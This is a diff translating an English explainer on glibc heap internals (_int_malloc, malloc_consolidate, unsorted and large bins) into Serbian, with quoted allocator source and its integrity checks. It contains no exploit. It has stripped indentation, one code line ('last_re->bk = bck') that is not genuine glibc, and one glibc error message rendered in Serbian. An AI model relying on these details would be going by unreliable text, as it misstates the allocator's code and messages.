-			set_non_main_arena (tc_victim);
-		      bin->bk = bck;
-		      bck->fd = bin;
+/* While bin not empty and tcache not full, copy chunks over.  */
+while (tcache->counts[tc_idx] < mp_.tcache_count
+&& (tc_victim = last (bin)) != bin)
+{
+if (tc_victim != 0)
+{
+bck = tc_victim->bk;
+set_inuse_bit_at_offset (tc_victim, nb);
+if (av != &main_arena)
+set_non_main_arena (tc_victim);
+bin->bk = bck;
+bck->fd = bin;
 
-		      tcache_put (tc_victim, tc_idx);
-	            }
-		}
-	    }
+tcache_put (tc_victim, tc_idx);
+}
+}
+}
 #endif
-          void *p = chunk2mem (victim);
-          alloc_perturb (p, bytes);
-          return p;
-        }
-    }
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
+}
+}
 ```
-
 

 
 ### malloc_consolidate
 
-If it wasn't a small chunk, it's a large chunk, and in this case **`malloc_consolidate`** is called to avoid memory fragmentation.
+Ako to nije bio mali deo, to je veliki deo, i u ovom slučaju **`malloc_consolidate`** se poziva da bi se izbegla fragmentacija memorije.
 
 

 
-malloc_consolidate call
-
+malloc_consolidate poziv
 ```c
 /*
-     If this is a large request, consolidate fastbins before continuing.
-     While it might look excessive to kill all fastbins before
-     even seeing if there is space available, this avoids
-     fragmentation problems normally associated with fastbins.
-     Also, in practice, programs tend to have runs of either small or
-     large requests, but less often mixtures, so consolidation is not
-     invoked all that often in most programs. And the programs that
-     it is called frequently in otherwise tend to fragment.
-   */
+If this is a large request, consolidate fastbins before continuing.
+While it might look excessive to kill all fastbins before
+even seeing if there is space available, this avoids
+fragmentation problems normally associated with fastbins.
+Also, in practice, programs tend to have runs of either small or
+large requests, but less often mixtures, so consolidation is not
+invoked all that often in most programs. And the programs that
+it is called frequently in otherwise tend to fragment.
+*/
 
-  else
-    {
-      idx = largebin_index (nb);
-      if (atomic_load_relaxed (&av->have_fastchunks))
-        malloc_consolidate (av);
-    }
+else
+{
+idx = largebin_index (nb);
+if (atomic_load_relaxed (&av->have_fastchunks))
+malloc_consolidate (av);
+}
 
 ```
-
 

 
-The malloc consolidate function basically removes chunks from the fast bin and places them into the unsorted bin. After the next malloc these chunks will be organized in their respective small/fast bins.
+Funkcija malloc consolidate u suštini uklanja delove iz brze kante i smešta ih u nesortiranu kantu. Nakon sledećeg malloc-a, ovi delovi će biti organizovani u svojim odgovarajućim malim/brzim kantama.
 
-Note that if while removing these chunks, if they are found with previous or next chunks that aren't in use they will be **unliked and merged** before placing the final chunk in the **unsorted** bin.
+Napomena: ako se prilikom uklanjanja ovih delova otkriju prethodni ili sledeći delovi koji nisu u upotrebi, oni će biti **unlinkovani i spojeni** pre nego što se konačni deo stavi u **nesortiranu** kantu.
 
-For each fast bin chunk a couple of security checks are performed:
+Za svaki deo iz brze kante vrši se nekoliko bezbednosnih provera:
 
-- If the chunk is unaligned trigger: `malloc_consolidate(): unaligned fastbin chunk detected`
-- If the chunk has a different size that the one it should because of the index it's in: `malloc_consolidate(): invalid chunk size`
-- If the previous chunk is not in use and the previous chunk has a size different of the one indicated by `prev_chunk`: `corrupted size vs. prev_size in fastbins`
+- Ako je deo neporavnat: `malloc_consolidate(): unaligned fastbin chunk detected`
+- Ako deo ima drugačiju veličinu od one koju bi trebao imati zbog indeksa u kojem se nalazi: `malloc_consolidate(): invalid chunk size`
+- Ako prethodni deo nije u upotrebi i prethodni deo ima veličinu koja se razlikuje od one koju označava `prev_chunk`: `corrupted size vs. prev_size in fastbins`
 
 

 
-malloc_consolidate function
-
+malloc_consolidate funkcija
 ```c
 // https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4810C1-L4905C2
 
 static void malloc_consolidate(mstate av)
 {
-  mfastbinptr*    fb;                 /* current fastbin being consolidated */
-  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
-  mchunkptr       p;                  /* current chunk being consolidated */
-  mchunkptr       nextp;              /* next chunk to consolidate */
-  mchunkptr       unsorted_bin;       /* bin header */
-  mchunkptr       first_unsorted;     /* chunk to link to */
+mfastbinptr*    fb;                 /* current fastbin being consolidated */
+mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+mchunkptr       p;                  /* current chunk being consolidated */
+mchunkptr       nextp;              /* next chunk to consolidate */
+mchunkptr       unsorted_bin;       /* bin header */
+mchunkptr       first_unsorted;     /* chunk to link to */
 
-  /* These have same use as in free() */
-  mchunkptr       nextchunk;
-  INTERNAL_SIZE_T size;
-  INTERNAL_SIZE_T nextsize;
-  INTERNAL_SIZE_T prevsize;
-  int             nextinuse;
+/* These have same use as in free() */
+mchunkptr       nextchunk;
+INTERNAL_SIZE_T size;
+INTERNAL_SIZE_T nextsize;
+INTERNAL_SIZE_T prevsize;
+int             nextinuse;
 
-  atomic_store_relaxed (&av->have_fastchunks, false);
+atomic_store_relaxed (&av->have_fastchunks, false);
 
-  unsorted_bin = unsorted_chunks(av);
+unsorted_bin = unsorted_chunks(av);
 
-  /*
-    Remove each chunk from fast bin and consolidate it, placing it
-    then in unsorted bin. Among other reasons for doing this,
-    placing in unsorted bin avoids needing to calculate actual bins
-    until malloc is sure that chunks aren't immediately going to be
-    reused anyway.
-  */
+/*
+Remove each chunk from fast bin and consolidate it, placing it
+then in unsorted bin. Among other reasons for doing this,
+placing in unsorted bin avoids needing to calculate actual bins
+until malloc is sure that chunks aren't immediately going to be
+reused anyway.
+*/
 
-  maxfb = &fastbin (av, NFASTBINS - 1);
-  fb = &fastbin (av, 0);
-  do {
-    p = atomic_exchange_acquire (fb, NULL);
-    if (p != 0) {
-      do {
-	{
-	  if (__glibc_unlikely (misaligned_chunk (p)))
-	    malloc_printerr ("malloc_consolidate(): "
-			     "unaligned fastbin chunk detected");
+maxfb = &fastbin (av, NFASTBINS - 1);
+fb = &fastbin (av, 0);
+do {
+p = atomic_exchange_acquire (fb, NULL);
+if (p != 0) {
+do {
+{
+if (__glibc_unlikely (misaligned_chunk (p)))
+malloc_printerr ("malloc_consolidate(): "
+"unaligned fastbin chunk detected");
 
-	  unsigned int idx = fastbin_index (chunksize (p));
-	  if ((&fastbin (av, idx)) != fb)
-	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
-	}
+unsigned int idx = fastbin_index (chunksize (p));
+if ((&fastbin (av, idx)) != fb)
+malloc_printerr ("malloc_consolidate(): invalid chunk size");
+}
 
-	check_inuse_chunk(av, p);
-	nextp = REVEAL_PTR (p->fd);
+check_inuse_chunk(av, p);
+nextp = REVEAL_PTR (p->fd);
 
-	/* Slightly streamlined version of consolidation code in free() */
-	size = chunksize (p);
-	nextchunk = chunk_at_offset(p, size);
-	nextsize = chunksize(nextchunk);
+/* Slightly streamlined version of consolidation code in free() */
+size = chunksize (p);
+nextchunk = chunk_at_offset(p, size);
+nextsize = chunksize(nextchunk);
 
-	if (!prev_inuse(p)) {
-	  prevsize = prev_size (p);
-	  size += prevsize;
-	  p = chunk_at_offset(p, -((long) prevsize));
-	  if (__glibc_unlikely (chunksize(p) != prevsize))
-	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
-	  unlink_chunk (av, p);
-	}
+if (!prev_inuse(p)) {
+prevsize = prev_size (p);
+size += prevsize;
+p = chunk_at_offset(p, -((long) prevsize));
+if (__glibc_unlikely (chunksize(p) != prevsize))
+malloc_printerr ("corrupted size vs. prev_size in fastbins");
+unlink_chunk (av, p);
+}
 
-	if (nextchunk != av->top) {
-	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+if (nextchunk != av->top) {
+nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
-	  if (!nextinuse) {
-	    size += nextsize;
-	    unlink_chunk (av, nextchunk);
-	  } else
-	    clear_inuse_bit_at_offset(nextchunk, 0);
+if (!nextinuse) {
+size += nextsize;
+unlink_chunk (av, nextchunk);
+} else
+clear_inuse_bit_at_offset(nextchunk, 0);
 
-	  first_unsorted = unsorted_bin->fd;
-	  unsorted_bin->fd = p;
-	  first_unsorted->bk = p;
+first_unsorted = unsorted_bin->fd;
+unsorted_bin->fd = p;
+first_unsorted->bk = p;
 
-	  if (!in_smallbin_range (size)) {
-	    p->fd_nextsize = NULL;
-	    p->bk_nextsize = NULL;
-	  }
+if (!in_smallbin_range (size)) {
+p->fd_nextsize = NULL;
+p->bk_nextsize = NULL;
+}
 
-	  set_head(p, size | PREV_INUSE);
-	  p->bk = unsorted_bin;
-	  p->fd = first_unsorted;
-	  set_foot(p, size);
-	}
+set_head(p, size | PREV_INUSE);
+p->bk = unsorted_bin;
+p->fd = first_unsorted;
+set_foot(p, size);
+}
 
-	else {
-	  size += nextsize;
-	  set_head(p, size | PREV_INUSE);
-	  av->top = p;
-	}
+else {
+size += nextsize;
+set_head(p, size | PREV_INUSE);
+av->top = p;
+}
 
-      } while ( (p = nextp) != 0);
+} while ( (p = nextp) != 0);
 
-    }
-  } while (fb++ != maxfb);
+}
+} while (fb++ != maxfb);
 }
 ```
-
 

 
-### Unsorted bin
+### Nepoređeni kontejner
 
-It's time to check the unsorted bin for a potential valid chunk to use.
+Vreme je da proverimo nepoređeni kontejner za potencijalno validan deo koji možemo koristiti.
 
-#### Start
+#### Početak
 
-This starts with a big for look that will be traversing the unsorted bin in the `bk` direction until it arrives til the end (the arena struct) with `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))` 
+Ovo počinje velikom for petljom koja će prolaziti kroz nepoređeni kontejner u `bk` pravcu dok ne stigne do kraja (arena struktura) sa `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))` 
 
-Moreover, some security checks are perform every time a new chunk is considered:
+Pored toga, neki sigurnosni provere se vrše svaki put kada se razmatra novi deo:
 
-- If the chunk size is weird (too small or too big): `malloc(): invalid size (unsorted)`
-- If the next chunk size is weird (too small or too big): `malloc(): invalid next size (unsorted)`
-- If the previous size indicated by the next chunk differs from the size of the chunk: `malloc(): mismatching next->prev_size (unsorted)`
-- If not `victim->bck->fd == victim` or not `victim->fd == av` (arena): `malloc(): unsorted double linked list corrupted`
-  - As we are always checking the las one, it's `fd` should be pointing always to the arena struct.
-- If the next chunk isn't indicating that the previous is in use: `malloc(): invalid next->prev_inuse (unsorted)`
+- Ako je veličina dela čudna (previše mala ili previše velika): `malloc(): invalid size (unsorted)`
+- Ako je veličina sledećeg dela čudna (previše mala ili previše velika): `malloc(): invalid next size (unsorted)`
+- Ako se prethodna veličina koju označava sledeći deo razlikuje od veličine dela: `malloc(): mismatching next->prev_size (unsorted)`
+- Ako nije `victim->bck->fd == victim` ili nije `victim->fd == av` (arena): `malloc(): unsorted double linked list corrupted`
+- Kako uvek proveravamo poslednji, njegov `fd` bi trebao uvek da pokazuje na arena strukturu.
+- Ako sledeći deo ne ukazuje da je prethodni u upotrebi: `malloc(): invalid next->prev_inuse (unsorted)`
 
 

 
-_int_malloc unsorted bin start
-
+_int_malloc početak nepoređenog kontejnera
 ```c
 /*
-     Process recently freed or remaindered chunks, taking one only if
-     it is exact fit, or, if this a small request, the chunk is remainder from
-     the most recent non-exact fit.  Place other traversed chunks in
-     bins.  Note that this step is the only place in any routine where
-     chunks are placed in bins.
+Process recently freed or remaindered chunks, taking one only if
+it is exact fit, or, if this a small request, the chunk is remainder from
+the most recent non-exact fit.  Place other traversed chunks in
+bins.  Note that this step is the only place in any routine where
+chunks are placed in bins.
 
-     The outer loop here is needed because we might not realize until
-     near the end of malloc that we should have consolidated, so must
-     do so and retry. This happens at most once, and only when we would
-     otherwise need to expand memory to service a "small" request.
-   */
+The outer loop here is needed because we might not realize until
+near the end of malloc that we should have consolidated, so must
+do so and retry. This happens at most once, and only when we would
+otherwise need to expand memory to service a "small" request.
+*/
 
 #if USE_TCACHE
-  INTERNAL_SIZE_T tcache_nb = 0;
-  size_t tc_idx = csize2tidx (nb);
-  if (tcache != NULL && tc_idx < mp_.tcache_bins)
-    tcache_nb = nb;
-  int return_cached = 0;
+INTERNAL_SIZE_T tcache_nb = 0;
+size_t tc_idx = csize2tidx (nb);
+if (tcache != NULL && tc_idx < mp_.tcache_bins)
+tcache_nb = nb;
+int return_cached = 0;
 
-  tcache_unsorted_count = 0;
+tcache_unsorted_count = 0;
 #endif
 
-  for (;; )
-    {
-      int iters = 0;
-      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
-        {
-          bck = victim->bk;
-          size = chunksize (victim);
-          mchunkptr next = chunk_at_offset (victim, size);
+for (;; )
+{
+int iters = 0;
+while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+{
+bck = victim->bk;
+size = chunksize (victim);
+mchunkptr next = chunk_at_offset (victim, size);
 
-          if (__glibc_unlikely (size <= CHUNK_HDR_SZ)
-              || __glibc_unlikely (size > av->system_mem))
-            malloc_printerr ("malloc(): invalid size (unsorted)");
-          if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ)
-              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
-            malloc_printerr ("malloc(): invalid next size (unsorted)");
-          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
-            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
-          if (__glibc_unlikely (bck->fd != victim)
-              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
-            malloc_printerr ("malloc(): unsorted double linked list corrupted");
-          if (__glibc_unlikely (prev_inuse (next)))
-            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+if (__glibc_unlikely (size <= CHUNK_HDR_SZ)
+|| __glibc_unlikely (size > av->system_mem))
+malloc_printerr ("malloc(): invalid size (unsorted)");
+if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ)
+|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+malloc_printerr ("malloc(): invalid next size (unsorted)");
+if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+if (__glibc_unlikely (bck->fd != victim)
+|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+malloc_printerr ("malloc(): unsorted double linked list corrupted");
+if (__glibc_unlikely (prev_inuse (next)))
+malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
 
 ```
-
 

 
-#### if `in_smallbin_range`
+#### ako `in_smallbin_range`
 
-If the chunk is bigger than the requested size use it, and set the rest of the chunk space into the unsorted list and update the `last_remainder` with it.
+Ako je deo veći od tražene veličine, iskoristite ga i postavite ostatak prostora dela u nesortiranu listu i ažurirajte `last_remainder` sa njim.
 
 

 
-_int_malloc unsorted bin in_smallbin_range
-
+_int_malloc nesortirana kofa in_smallbin_range
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4090C11-L4124C14
 
 /*
-             If a small request, try to use last remainder if it is the
-             only chunk in unsorted bin.  This helps promote locality for
-             runs of consecutive small requests. This is the only
-             exception to best-fit, and applies only when there is
-             no exact fit for a small chunk.
-           */
+If a small request, try to use last remainder if it is the
+only chunk in unsorted bin.  This helps promote locality for
+runs of consecutive small requests. This is the only
+exception to best-fit, and applies only when there is
+no exact fit for a small chunk.
+*/
 
-          if (in_smallbin_range (nb) &&
-              bck == unsorted_chunks (av) &&
-              victim == av->last_remainder &&
-              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
-            {
-              /* split and reattach remainder */
-              remainder_size = size - nb;
-              remainder = chunk_at_offset (victim, nb);
-              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
-              av->last_remainder = remainder;
-              remainder->bk = remainder->fd = unsorted_chunks (av);
-              if (!in_smallbin_range (remainder_size))
-                {
-                  remainder->fd_nextsize = NULL;
-                  remainder->bk_nextsize = NULL;
-                }
+if (in_smallbin_range (nb) &&
+bck == unsorted_chunks (av) &&
+victim == av->last_remainder &&
+(unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+{
+/* split and reattach remainder */
+remainder_size = size - nb;
+remainder = chunk_at_offset (victim, nb);
+unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+av->last_remainder = remainder;
+remainder->bk = remainder->fd = unsorted_chunks (av);
+if (!in_smallbin_range (remainder_size))
+{
+remainder->fd_nextsize = NULL;
+remainder->bk_nextsize = NULL;
+}
 
-              set_head (victim, nb | PREV_INUSE |
-                        (av != &main_arena ? NON_MAIN_ARENA : 0));
-              set_head (remainder, remainder_size | PREV_INUSE);
-              set_foot (remainder, remainder_size);
+set_head (victim, nb | PREV_INUSE |
+(av != &main_arena ? NON_MAIN_ARENA : 0));
+set_head (remainder, remainder_size | PREV_INUSE);
+set_foot (remainder, remainder_size);
 
-              check_malloced_chunk (av, victim, nb);
-              void *p = chunk2mem (victim);
-              alloc_perturb (p, bytes);
-              return p;
-            }
+check_malloced_chunk (av, victim, nb);
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
+}
 
 ```
-
 

 
-If this was successful, return the chunk ant it's over, if not, continue executing the function...
+Ako je ovo uspešno, vrati deo i to je to, ako ne, nastavi sa izvršavanjem funkcije...
 
-#### if equal size
+#### ako je veličina jednaka
 
-Continue removing the chunk from the bin, in case the requested size is exactly the one of the chunk:
+Nastavi sa uklanjanjem dela iz bin-a, u slučaju da je tražena veličina tačno veličina dela:
 
-- If the tcache is not filled, add it to the tcache and continue indicating that there is a tcache chunk that could be used
-- If tcache is full, just use it returning it
+- Ako tcache nije popunjen, dodaj ga u tcache i nastavi ukazujući da postoji tcache deo koji bi mogao biti korišćen
+- Ako je tcache pun, jednostavno ga koristi vraćajući ga
 
 

 
-_int_malloc unsorted bin equal size
-
+_int_malloc nesortiran bin jednaka veličina
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4126C11-L4157C14
 
 /* remove from unsorted list */
-          unsorted_chunks (av)->bk = bck;
-          bck->fd = unsorted_chunks (av);
+unsorted_chunks (av)->bk = bck;
+bck->fd = unsorted_chunks (av);
 
-          /* Take now instead of binning if exact fit */
+/* Take now instead of binning if exact fit */
 
-          if (size == nb)
-            {
-              set_inuse_bit_at_offset (victim, size);
-              if (av != &main_arena)
-		set_non_main_arena (victim);
+if (size == nb)
+{
+set_inuse_bit_at_offset (victim, size);
+if (av != &main_arena)
+set_non_main_arena (victim);
 #if USE_TCACHE
-	      /* Fill cache first, return to user only if cache fills.
-		 We may return one of these chunks later.  */
-	      if (tcache_nb > 0
-		  && tcache->counts[tc_idx] < mp_.tcache_count)
-		{
-		  tcache_put (victim, tc_idx);
-		  return_cached = 1;
-		  continue;
-		}
-	      else
-		{
+/* Fill cache first, return to user only if cache fills.
+We may return one of these chunks later.  */
+if (tcache_nb > 0
+&& tcache->counts[tc_idx] < mp_.tcache_count)
+{
+tcache_put (victim, tc_idx);
+return_cached = 1;
+continue;
+}
+else
+{
 #endif
-              check_malloced_chunk (av, victim, nb);
-              void *p = chunk2mem (victim);
-              alloc_perturb (p, bytes);
-              return p;
+check_malloced_chunk (av, victim, nb);
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
 #if USE_TCACHE
-		}
+}
 #endif
-            }
+}
 
 ```
-
 

 
-If chunk not returned or added to tcache, continue with the code...
+Ako deo nije vraćen ili dodat u tcache, nastavite sa kodom...
 
-#### place chunk in a bin
+#### stavite deo u kantu
 
-Store the checked chunk in the small bin or in the large bin according to the size of the chunk (keeping the large bin properly organized).
+Skladištite provereni deo u maloj kanti ili u velikoj kanti u zavisnosti od veličine dela (držeći veliku kantu pravilno organizovanom).
 
-There are security checks being performed to make sure both large bin doubled linked list are corrupted:
+Vrše se bezbednosne provere kako bi se osiguralo da su obe velike kante dvostruko povezane liste oštećene:
 
-- If `fwd->bk_nextsize->fd_nextsize != fwd`: `malloc(): largebin double linked list corrupted (nextsize)`
-- If `fwd->bk->fd != fwd`: `malloc(): largebin double linked list corrupted (bk)`
+- Ako `fwd->bk_nextsize->fd_nextsize != fwd`: `malloc(): largebin double linked list corrupted (nextsize)`
+- Ako `fwd->bk->fd != fwd`: `malloc(): largebin double linked list corrupted (bk)`
 
 

 
-_int_malloc place chunk in a bin
-
+_int_malloc stavite deo u kantu
 ```c
 /* place chunk in bin */
 
-          if (in_smallbin_range (size))
-            {
-              victim_index = smallbin_index (size);
-              bck = bin_at (av, victim_index);
-              fwd = bck->fd;
-            }
-          else
-            {
-              victim_index = largebin_index (size);
-              bck = bin_at (av, victim_index);
-              fwd = bck->fd;
+if (in_smallbin_range (size))
+{
+victim_index = smallbin_index (size);
+bck = bin_at (av, victim_index);
+fwd = bck->fd;
+}
+else
+{
+victim_index = largebin_index (size);
+bck = bin_at (av, victim_index);
+fwd = bck->fd;
 
-              /* maintain large bins in sorted order */
-              if (fwd != bck)
-                {
-                  /* Or with inuse bit to speed comparisons */
-                  size |= PREV_INUSE;
-                  /* if smaller than smallest, bypass loop below */
-                  assert (chunk_main_arena (bck->bk));
-                  if ((unsigned long) (size)
-		      < (unsigned long) chunksize_nomask (bck->bk))
-                    {
-                      fwd = bck;
-                      bck = bck->bk;
+/* maintain large bins in sorted order */
+if (fwd != bck)
+{
+/* Or with inuse bit to speed comparisons */
+size |= PREV_INUSE;
+/* if smaller than smallest, bypass loop below */
+assert (chunk_main_arena (bck->bk));
+if ((unsigned long) (size)
+< (unsigned long) chunksize_nomask (bck->bk))
+{
+fwd = bck;
+bck = bck->bk;
 
-                      victim->fd_nextsize = fwd->fd;
-                      victim->bk_nextsize = fwd->fd->bk_nextsize;
-                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
-                    }
-                  else
-                    {
-                      assert (chunk_main_arena (fwd));
-                      while ((unsigned long) size < chunksize_nomask (fwd))
-                        {
-                          fwd = fwd->fd_nextsize;
-			  assert (chunk_main_arena (fwd));
-                        }
+victim->fd_nextsize = fwd->fd;
+victim->bk_nextsize = fwd->fd->bk_nextsize;
+fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+}
+else
+{
+assert (chunk_main_arena (fwd));
+while ((unsigned long) size < chunksize_nomask (fwd))
+{
+fwd = fwd->fd_nextsize;
+assert (chunk_main_arena (fwd));
+}
 
-                      if ((unsigned long) size
-			  == (unsigned long) chunksize_nomask (fwd))
-                        /* Always insert in the second position.  */
-                        fwd = fwd->fd;
-                      else
-                        {
-                          victim->fd_nextsize = fwd;
-                          victim->bk_nextsize = fwd->bk_nextsize;
-                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
-                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
-                          fwd->bk_nextsize = victim;
-                          victim->bk_nextsize->fd_nextsize = victim;
-                        }
-                      bck = fwd->bk;
-                      if (bck->fd != fwd)
-                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
-                    }
-                }
-              else
-                victim->fd_nextsize = victim->bk_nextsize = victim;
-            }
+if ((unsigned long) size
+== (unsigned long) chunksize_nomask (fwd))
+/* Always insert in the second position.  */
+fwd = fwd->fd;
+else
+{
+victim->fd_nextsize = fwd;
+victim->bk_nextsize = fwd->bk_nextsize;
+if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+fwd->bk_nextsize = victim;
+victim->bk_nextsize->fd_nextsize = victim;
+}
+bck = fwd->bk;
+if (bck->fd != fwd)
+malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+}
+}
+else
+victim->fd_nextsize = victim->bk_nextsize = victim;
+}
 
-          mark_bin (av, victim_index);
-          victim->bk = bck;
-          victim->fd = fwd;
-          fwd->bk = victim;
-          bck->fd = victim;
+mark_bin (av, victim_index);
+victim->bk = bck;
+victim->fd = fwd;
+fwd->bk = victim;
+bck->fd = victim;
 ```
-
 

 
-#### `_int_malloc` limits
+#### `_int_malloc` ograničenja
 
-At this point, if some chunk was stored in the tcache that can be used and the limit is reached, just **return a tcache chunk**.
+U ovom trenutku, ako je neki deo sačuvan u tcache koji se može koristiti i limit je dostignut, samo **vrati tcache deo**.
 
-Moreover, if **MAX_ITERS** is reached, break from the loop for and get a chunk in a different way (top chunk).
+Štaviše, ako je dostignut **MAX_ITERS**, prekinite petlju i dobijte deo na drugačiji način (top deo).
 
-If `return_cached` was set, just return a chunk from the tcache to avoid larger searches.
+Ako je `return_cached` postavljen, samo vratite deo iz tcache da biste izbegli veće pretrage.
 
 

 
-_int_malloc limits
-
+_int_malloc ograničenja
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4227C1-L4250C7
 
 #if USE_TCACHE
-      /* If we've processed as many chunks as we're allowed while
-	 filling the cache, return one of the cached ones.  */
-      ++tcache_unsorted_count;
-      if (return_cached
-	  && mp_.tcache_unsorted_limit > 0
-	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
-	{
-	  return tcache_get (tc_idx);
-	}
+/* If we've processed as many chunks as we're allowed while
+filling the cache, return one of the cached ones.  */
+++tcache_unsorted_count;
+if (return_cached
+&& mp_.tcache_unsorted_limit > 0
+&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
+{
+return tcache_get (tc_idx);
+}
 #endif
 
 #define MAX_ITERS       10000
-          if (++iters >= MAX_ITERS)
-            break;
-        }
+if (++iters >= MAX_ITERS)
+break;
+}
 
 #if USE_TCACHE
-      /* If all the small chunks we found ended up cached, return one now.  */
-      if (return_cached)
-	{
-	  return tcache_get (tc_idx);
-	}
+/* If all the small chunks we found ended up cached, return one now.  */
+if (return_cached)
+{
+return tcache_get (tc_idx);
+}
 #endif
 ```
-
 

 
-If limits not reached, continue with the code...
+Ako granice nisu dostignute, nastavite sa kodom...
 
-### Large Bin (by index)
+### Velika kesa (po indeksu)
 
-If the request is large (not in small bin) and we haven't yet returned any chunk, get the **index** of the requested size in the **large bin**, check if **not empty** of if the **biggest chunk in this bin is bigger** than the requested size and in that case find the **smallest chunk that can be used** for the requested size.
+Ako je zahtev velik (nije u maloj kesi) i još nismo vratili nijedan deo, uzmite **indeks** tražene veličine u **velikoj kesi**, proverite da li je **prazna** ili ako je **najveći deo u ovoj kesi veći** od tražene veličine i u tom slučaju pronađite **najmanji deo koji se može koristiti** za traženu veličinu.
 
-If the reminder space from the finally used chunk can be a new chunk, add it to the unsorted bin and the lsast_reminder is updated.
+Ako prostor koji ostaje od konačno korišćenog dela može biti novi deo, dodajte ga u neuređenu kesu i lsast_reminder se ažurira.
 
-A security check is made when adding the reminder to the unsorted bin:
+Bezbednosna provera se vrši prilikom dodavanja ostatka u neuređenu kesu:
 
-- `bck->fd-> bk != bck`: `malloc(): corrupted unsorted chunks`
+- `bck->fd-> bk != bck`: `malloc(): oštećeni neuređeni delovi`
 
 

 
-_int_malloc Large bin (by index)
-
+_int_malloc Velika kesa (po indeksu)
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4252C7-L4317C10
 
 /*
-         If a large request, scan through the chunks of current bin in
-         sorted order to find smallest that fits.  Use the skip list for this.
-       */
+If a large request, scan through the chunks of current bin in
+sorted order to find smallest that fits.  Use the skip list for this.
+*/
 
-      if (!in_smallbin_range (nb))
-        {
-          bin = bin_at (av, idx);
+if (!in_smallbin_range (nb))
+{
+bin = bin_at (av, idx);
 
-          /* skip scan if empty or largest chunk is too small */
-          if ((victim = first (bin)) != bin
-	      && (unsigned long) chunksize_nomask (victim)
-	        >= (unsigned long) (nb))
-            {
-              victim = victim->bk_nextsize;
-              while (((unsigned long) (size = chunksize (victim)) <
-                      (unsigned long) (nb)))
-                victim = victim->bk_nextsize;
+/* skip scan if empty or largest chunk is too small */
+if ((victim = first (bin)) != bin
+&& (unsigned long) chunksize_nomask (victim)
+>= (unsigned long) (nb))
+{
+victim = victim->bk_nextsize;
+while (((unsigned long) (size = chunksize (victim)) <
+(unsigned long) (nb)))
+victim = victim->bk_nextsize;
 
-              /* Avoid removing the first entry for a size so that the skip
-                 list does not have to be rerouted.  */
-              if (victim != last (bin)
-		  && chunksize_nomask (victim)
-		    == chunksize_nomask (victim->fd))
-                victim = victim->fd;
+/* Avoid removing the first entry for a size so that the skip
+list does not have to be rerouted.  */
+if (victim != last (bin)
+&& chunksize_nomask (victim)
+== chunksize_nomask (victim->fd))
+victim = victim->fd;
 
-              remainder_size = size - nb;
-              unlink_chunk (av, victim);
+remainder_size = size - nb;
+unlink_chunk (av, victim);
 
-              /* Exhaust */
-              if (remainder_size < MINSIZE)
-                {
-                  set_inuse_bit_at_offset (victim, size);
-                  if (av != &main_arena)
-		    set_non_main_arena (victim);
-                }
-              /* Split */
-              else
-                {
-                  remainder = chunk_at_offset (victim, nb);
-                  /* We cannot assume the unsorted list is empty and therefore
-                     have to perform a complete insert here.  */
-                  bck = unsorted_chunks (av);
-                  fwd = bck->fd;
-		  if (__glibc_unlikely (fwd->bk != bck))
-		    malloc_printerr ("malloc(): corrupted unsorted chunks");
-                  last_re->bk = bck;
-                  remainder->fd = fwd;
-                  bck->fd = remainder;
-                  fwd->bk = remainder;
-                  if (!in_smallbin_range (remainder_size))
-                    {
-                      remainder->fd_nextsize = NULL;
-                      remainder->bk_nextsize = NULL;
-                    }
-                  set_head (victim, nb | PREV_INUSE |
-                            (av != &main_arena ? NON_MAIN_ARENA : 0));
-                  set_head (remainder, remainder_size | PREV_INUSE);
-                  set_foot (remainder, remainder_size);
-                }
-              check_malloced_chunk (av, victim, nb);
-              void *p = chunk2mem (victim);
-              alloc_perturb (p, bytes);
-              return p;
-            }
-        }
+/* Exhaust */
+if (remainder_size < MINSIZE)
+{
+set_inuse_bit_at_offset (victim, size);
+if (av != &main_arena)
+set_non_main_arena (victim);
+}
+/* Split */
+else
+{
+remainder = chunk_at_offset (victim, nb);
+/* We cannot assume the unsorted list is empty and therefore
